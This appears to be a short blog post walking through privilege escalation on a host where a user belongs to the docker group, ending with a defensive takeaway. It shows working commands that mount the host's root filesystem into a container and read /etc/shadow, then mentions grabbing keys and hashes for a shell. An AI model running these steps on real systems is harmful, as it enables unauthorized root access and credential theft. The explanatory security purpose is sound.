I don’t think Docker needs an introduction at this point, but in case you are unfamiliar with it; it is a way of isolating software packages by virtualizing them on an OS-level which runs in “containers.” It works in a similar way to traditional virtual machines, but with much less overhead as the kernel is shared between multiple containers.
The problem arises when the docker group is assigned to the host user. Since docker is running as root with SGID, an unauthorized person who has access to the host user (with user privileges) can easily escalate privileges by mounting the host volume to one of the containers; granting the attacker full access to the filesystem.
First, make sure the host user is part of the docker group:
alice@jada:~$ groups
alice cdrom floppy audio dip video plugdev netdev bluetooth docker
Run docker container ps
to get a quick list of the containers:
alice@jada:~$ docker container ps
CONTAINER ID IMAGE COMMAND NAMES
f00ba96171c5 container1 "docker-php-entrypoi…" container1
ce2ecb56a96e container2 "/etc/bind/entrypoin…" container2
620b296204a3 container3 "/usr/sbin/sshd -D" container3
From here you can spawn a tty for each container:
alice@jada:~$ docker run -ti container1 bash
root@f00ba96171c5:/#
Even better, you can specify -v
to mount the entire filesystem of the host to one of the containers before accessing it. It doesn’t matter which one.
alice@jada:~$ docker run -v /:/mnt/pwned -ti container2
root@ce2ecb56a96e:/# cat /mnt/pwned/etc/shadow
You now have full access to the host volume, and from here it’s just a matter of grabbing keys, hashes, and whatnot to get a shell.
Takeaways
Don’t assign users to docker groups.